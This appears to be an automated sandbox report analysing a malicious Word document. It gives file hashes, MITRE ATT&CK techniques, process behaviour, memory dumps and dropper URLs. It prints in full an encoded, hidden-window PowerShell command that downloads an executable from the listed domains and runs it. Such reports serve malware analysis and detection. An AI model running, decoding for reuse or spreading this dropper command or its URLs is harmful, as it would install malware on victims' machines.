8846893c9d7c2a8b9d97068084f8c171e9110cf34322e70110da781dad24cc75

General

Target

e62f2edfeff116d22cc4f93d5b0313df_JaffaCakes118.doc
Size

200KB
MD5

e62f2edfeff116d22cc4f93d5b0313df
SHA1

4df8c1cbdce38925cc640f8d9649ee9b6a210cd3
SHA256

8846893c9d7c2a8b9d97068084f8c171e9110cf34322e70110da781dad24cc75
SHA512

b4cccee2550788949d3d6b510f84eaa1044f3c851136bc77e9f89127cd833c4eb0c5574524589db2a81fc753aa9d19f834604c11411445dac5c414f11a89d7c8
SSDEEP

3072:Ph2y/GdyjktGDWLS0HZWD5w8K7Nk9LD7IBUWlwCDuRdj95ks2:Ph2k4ztGiL3HJk9LD7bswC6Rdj95k/

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://moisesdavid.com/qoong/vy/

exe.dropper

http://insurancebabu.com/wp-admin/iXElcu9f/

exe.dropper

http://rishi99.com/framework.impossible/dhADGeie6/

exe.dropper

https://www.alertpage.net/confirmation/2nX/

exe.dropper

https://anttarc.org/chartaxd/DMBuiwf5u/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4492	3568	Powershell.exe	82

Blocklisted process makes network request 4 IoCs

flow	pid	Process
26	4492	Powershell.exe
27	4492	Powershell.exe
31	4492	Powershell.exe
33	4492	Powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4492	Powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
4000	WINWORD.EXE
4000	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4492	Powershell.exe
4492	Powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4492	Powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
4000	WINWORD.EXE
4000	WINWORD.EXE

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
4000	WINWORD.EXE
4000	WINWORD.EXE
4000	WINWORD.EXE
4000	WINWORD.EXE
4000	WINWORD.EXE
4000	WINWORD.EXE
4000	WINWORD.EXE

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 4000 wrote to memory of 1456	4000	WINWORD.EXE	85
PID 4000 wrote to memory of 1456	4000	WINWORD.EXE	85

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e62f2edfeff116d22cc4f93d5b0313df_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4000
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1456

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABCAHcAbABiAGoAagBtAGoAegB2AD0AJwBJAHQAbQBwAG0AcgBuAGgAbABsAHUAJwA7ACQAVgBpAGkAaQBnAHAAegBlAGUAcwB2ACAAPQAgACcAOAA3ADMAJwA7ACQATgBqAHMAdABiAGgAbAB1AG8APQAnAFUAcgBlAGEAZgB2AG4AdABzAHgAdwBuAG8AJwA7ACQASwBkAHEAZwBsAHcAYQBvAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABWAGkAaQBpAGcAcAB6AGUAZQBzAHYAKwAnAC4AZQB4AGUAJwA7ACQASAByAHkAcABjAHAAdQBiAD0AJwBRAGYAdQBpAGYAbwBlAGQAJwA7ACQATQBrAHgAdABqAGkAYQByAHIAPQAuACgAJwBuAGUAdwAtAG8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AdwBlAEIAQwBsAGkAZQBOAHQAOwAkAFYAZwB4AHAAcgBhAG0AagBzAGIAPQAnAGgAdAB0AHAAOgAvAC8AbQBvAGkAcwBlAHMAZABhAHYAaQBkAC4AYwBvAG0ALwBxAG8AbwBuAGcALwB2AHkALwAqAGgAdAB0AHAAOgAvAC8AaQBuAHMAdQByAGEAbgBjAGUAYgBhAGIAdQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AaQBYAEUAbABjAHUAOQBmAC8AKgBoAHQAdABwADoALwAvAHIAaQBzAGgAaQA5ADkALgBjAG8AbQAvAGYAcgBhAG0AZQB3AG8AcgBrAC4AaQBtAHAAbwBzAHMAaQBiAGwAZQAvAGQAaABBAEQARwBlAGkAZQA2AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBhAGwAZQByAHQAcABhAGcAZQAuAG4AZQB0AC8AYwBvAG4AZgBpAHIAbQBhAHQAaQBvAG4ALwAyAG4AWAAvACoAaAB0AHQAcABzADoALwAvAGEAbgB0AHQAYQByAGMALgBvAHIAZwAvAGMAaABhAHIAdABhAHgAZAAvAEQATQBCAHUAaQB3AGYANQB1AC8AJwAuACIAUwBQAGwAYABpAFQAIgAoACcAKgAnACkAOwAkAEEAaQBnAGYAcQBoAGQAcABrAHIAdwBlAD0AJwBaAHUAdwB6AGgAawBhAHEAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEMAdQB6AGgAZABmAHEAbwBjAGoAdwB4ACAAaQBuACAAJABWAGcAeABwAHIAYQBtAGoAcwBiACkAewB0AHIAeQB7ACQATQBrAHgAdABqAGkAYQByAHIALgAiAEQAYABPAHcATgBgAGwATwBBAEQAZgBpAEwARQAiACgAJABDAHUAegBoAGQAZgBxAG8AYwBqAHcAeAAsACAAJABLAGQAcQBnAGwAdwBhAG8AKQA7ACQATwBwAHMAawBtAGoAcgBqAHkAYQBhAHoAbAA9ACcAVQBsAGUAcQBmAGcAbQBlAHQAagBrAHIAZgAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAEsAZABxAGcAbAB3AGEAbwApAC4AIgBsAGAARQBgAE4AZwB0AGgAIgAgAC0AZwBlACAAMwA2ADkANwA3ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABBAGAAUgBUACIAKAAkAEsAZABxAGcAbAB3AGEAbwApADsAJABLAGEAaQByAGEAcABzAGMAYgB6AG0APQAnAFoAegBqAGUAYQBtAHoAdwAnADsAYgByAGUAYQBrADsAJABSAGIAbAB5AGIAYwByAGwAPQAnAEoAcQB6AGMAYQB5AGYAcwBjAHAAZgB0ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUAagBiAG4AZgBqAGYAdQA9ACcAUQBxAHAAcQByAGEAagBuAHoAawBzAGoAYQAnAA==
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4492

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\83A3C68B.wmf

Filesize
444B

MD5
c919824e5d6a1ef432e263d5d9e6253a

SHA1
5b3dbaff04615c71d594140c316e5c209e58550c

SHA256
5145bbee26ff795a75ce45f5959d9b6ba613d30d5d0779ff3e034e6793e2ea08

SHA512
ef4a4fc83575b32980b4cf3a625c09235d93f820008429d03059ac89f02c4b57b5d2fd6b64ba2bcd9eb36b31ce899f1bf40e0dd329a58a4dc7d27914171fdeb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCDC1E2.tmp\gb.xsl

Filesize
262KB

MD5
51d32ee5bc7ab811041f799652d26e04

SHA1
412193006aa3ef19e0a57e16acf86b830993024a

SHA256
6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

SHA512
5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nef0xzze.y30.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
1KB

MD5
efbe7a4e9bce81974766e348da920337

SHA1
ba20d5d5b577b5c9949a0cc49132b829f9a731c1

SHA256
d4fb1ab4d5fe5ff6a6aef2857c1c1f237b5b6bbaf3d5862c18b9393abbdb3544

SHA512
daf00622c1a7d3d65e1192faeb5068ea04a814ba3535ceae91b8e2cc509668bf237636ed77ae3d0c868a90db9d3837f1441e9dda6f7ae9c2c7ca0da0b423aa46

Download Submit
memory/4000-13-0x00007FFE40270000-0x00007FFE40465000-memory.dmp

Filesize
2.0MB

Download
memory/4000-20-0x00007FFE40270000-0x00007FFE40465000-memory.dmp

Filesize
2.0MB

Download
memory/4000-8-0x00007FFE40270000-0x00007FFE40465000-memory.dmp

Filesize
2.0MB

Download
memory/4000-11-0x00007FFE40270000-0x00007FFE40465000-memory.dmp

Filesize
2.0MB

Download
memory/4000-7-0x00007FFE40270000-0x00007FFE40465000-memory.dmp

Filesize
2.0MB

Download
memory/4000-6-0x00007FFE40270000-0x00007FFE40465000-memory.dmp

Filesize
2.0MB

Download
memory/4000-5-0x00007FFE002F0000-0x00007FFE00300000-memory.dmp

Filesize
64KB

Download
memory/4000-12-0x00007FFDFDDA0000-0x00007FFDFDDB0000-memory.dmp

Filesize
64KB

Download
memory/4000-18-0x00007FFE40270000-0x00007FFE40465000-memory.dmp

Filesize
2.0MB

Download
memory/4000-17-0x00007FFE40270000-0x00007FFE40465000-memory.dmp

Filesize
2.0MB

Download
memory/4000-16-0x00007FFE40270000-0x00007FFE40465000-memory.dmp

Filesize
2.0MB

Download
memory/4000-15-0x00007FFE40270000-0x00007FFE40465000-memory.dmp

Filesize
2.0MB

Download
memory/4000-14-0x00007FFE40270000-0x00007FFE40465000-memory.dmp

Filesize
2.0MB

Download
memory/4000-1-0x00007FFE4030D000-0x00007FFE4030E000-memory.dmp

Filesize
4KB

Download
memory/4000-19-0x00007FFDFDDA0000-0x00007FFDFDDB0000-memory.dmp

Filesize
64KB

Download
memory/4000-9-0x00007FFE40270000-0x00007FFE40465000-memory.dmp

Filesize
2.0MB

Download
memory/4000-10-0x00007FFE40270000-0x00007FFE40465000-memory.dmp

Filesize
2.0MB

Download
memory/4000-235-0x00007FFE40270000-0x00007FFE40465000-memory.dmp

Filesize
2.0MB

Download
memory/4000-2-0x00007FFE002F0000-0x00007FFE00300000-memory.dmp

Filesize
64KB

Download
memory/4000-4-0x00007FFE002F0000-0x00007FFE00300000-memory.dmp

Filesize
64KB

Download
memory/4000-74-0x00007FFE40270000-0x00007FFE40465000-memory.dmp

Filesize
2.0MB

Download
memory/4000-75-0x00007FFE4030D000-0x00007FFE4030E000-memory.dmp

Filesize
4KB

Download
memory/4000-78-0x00007FFE40270000-0x00007FFE40465000-memory.dmp

Filesize
2.0MB

Download
memory/4000-84-0x00007FFE40270000-0x00007FFE40465000-memory.dmp

Filesize
2.0MB

Download
memory/4000-0-0x00007FFE002F0000-0x00007FFE00300000-memory.dmp

Filesize
64KB

Download
memory/4000-3-0x00007FFE002F0000-0x00007FFE00300000-memory.dmp

Filesize
64KB

Download
memory/4000-232-0x00007FFE002F0000-0x00007FFE00300000-memory.dmp

Filesize
64KB

Download
memory/4000-231-0x00007FFE002F0000-0x00007FFE00300000-memory.dmp

Filesize
64KB

Download
memory/4000-234-0x00007FFE002F0000-0x00007FFE00300000-memory.dmp

Filesize
64KB

Download
memory/4000-233-0x00007FFE002F0000-0x00007FFE00300000-memory.dmp

Filesize
64KB

Download
memory/4492-63-0x0000020BEED80000-0x0000020BEEDA2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads